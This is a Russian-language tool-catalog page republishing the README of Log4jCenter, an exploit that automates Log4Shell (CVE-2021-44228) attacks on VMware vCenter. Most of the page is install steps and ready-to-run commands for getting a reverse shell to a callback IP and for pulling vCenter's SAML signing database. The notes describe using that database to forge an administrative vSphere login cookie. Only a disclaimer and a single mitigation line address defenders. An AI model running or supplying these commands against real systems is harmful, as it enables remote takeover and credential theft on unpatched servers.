Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Log4jCenter — Эксплуатация CVE-2021-44228 в vCenter для удаленного выполнения кода и не только. | Kitploit
Инструменты/GitHubGitHub/puzzlepeaches/log4jcenter
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийЭксфильтрация данныхТестирование на ПроникновениеКомандование и Управление
GitHubpuzzlepeaches/log4jcenter

Log4jCenter

Эксплуатация CVE-2021-44228 в vCenter для удаленного выполнения кода и не только.

Репозиторий
105194 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Log4jCenter

Эксплуатация CVE-2021-44228 в vCenter для удаленного выполнения кода и многого другого. Запись в блоге с подробным описанием эксплуатации приведена ниже:

  • Как эксплуатировать уязвимости Log4j в VMWare vCenter

Почему?

Доказательства концепции (PoC) для этой уязвимости разрознены и требуют ручного выполнения. Этот репозиторий автоматизирует процесс эксплуатации и демонстрирует дополнительный путь атаки, возможный после эксплуатации.

Установка

Ручная установка

Чтобы вручную загрузить и запустить эксплойт, выполните следующие шаги. Сначала убедитесь, что на вашем атакующем хосте установлены Java и Maven. Для этого с помощью apt в операционных системах на основе Debian выполните следующую команду:

root@kitploit:~
apt update && apt install openjdk-11-jre maven

Клонируйте репозиторий GitHub и установите все требования Python:

root@kitploit:~
git clone --recurse-submodules https://github.com/puzzlepeaches/Log4jCenter \
    && cd Log4jCenter && pip3 install -r requirements.txt

Из корня репозитория Log4jCenter скомпилируйте проект Rogue-Jndi с помощью следующей команды:

root@kitploit:~
mvn package -f utils/rogue-jndi/

Установка через Docker

Сначала убедитесь, что Docker установлен на вашем атакующем хосте. (Я не буду объяснять, как это сделать)

После этого выполните следующую команду, чтобы клонировать репозиторий и создать образ Docker, который мы будем использовать.

root@kitploit:~
git clone --recurse-submodules https://github.com/puzzlepeaches/Log4jCenter \
    && cd Log4jCenter && docker build -t log4jcenter .

Чтобы запустить контейнер, выполните команду, аналогичную приведенной ниже, с добавлением флагов командной строки. Например, следующая команда используется для эксплуатации vCenter и получения обратной оболочки. Обратите внимание, что контейнер не перехватит обратную оболочку. Вам нужно создать слушатель ncat в отдельном сеансе оболочки:

root@kitploit:~
docker run -it -v $(pwd)/loot:/Log4jCenter/loot -p 8090:8090 -p 1389:1389 log4jcenter \ 
    -t 10.100.100.1 -i 192.168.1.1 -p 4444 -r

Использование

root@kitploit:~
usage: exploit.py [-h] -t IP -i CALLBACK [-p PORT] [-e] [-r]

optional arguments:
  -h, --help            show this help message and exit
  -t IP, --target IP    vCenter Host IP
  -i CALLBACK, --ip CALLBACK
                        Callback IP for payload delivery and reverse shell.
  -p PORT, --port PORT  Callback port for reverse shell.
  -e, --exfiltrate      Module to pull SAML DB
  -r, --revshell        Module to establish reverse shell

Примеры

Получите обратную оболочку, используя инструмент, установленный в вашей локальной системе:

root@kitploit:~
python3 exploit.py -t vcenter.acme.com -i 10.10.10.1 -p 4444 -r

Извлеките базы данных подписи SAML из контейнера Docker:

root@kitploit:~
docker run -it -v $(pwd)/loot:/Log4jCenter/loot -p 1389:1389 -p 8090:8090 log4jcenter \
    -t 10.100.100.1 -i 192.168.1.1 -e

Примечания

  • По неизвестной причине полезная нагрузка обратной оболочки может не сработать после первого запуска скрипта. Возможно, придется запустить эксплойт несколько раз, чтобы получить обратный вызов. Буду исследовать это и включу исправление в будущий релиз.
  • В каталоге utils включен репозиторий vcenter_saml_login. Вы можете использовать его в сочетании с флагом -e для извлечения базы данных подписи SAML vCenter и создания административного cookie для входа в vSphere. Вам потребуется установить требования отдельно.
  • Для защитников: вы можете смягчить эту проблему, используя патч, который скоро выйдет, или обходной путь, описанный здесь

Отказ от ответственности

Этот инструмент предназначен для использования во время тестирования на проникновение; использование этого инструмента для атак на цели без предварительного взаимного согласия незаконно. Конечный пользователь несет ответственность за соблюдение всех применимых местных, государственных и федеральных законов. Разработчики не несут ответственности и не несут ответственности за любое неправильное использование этой программы.

Скачать инструмент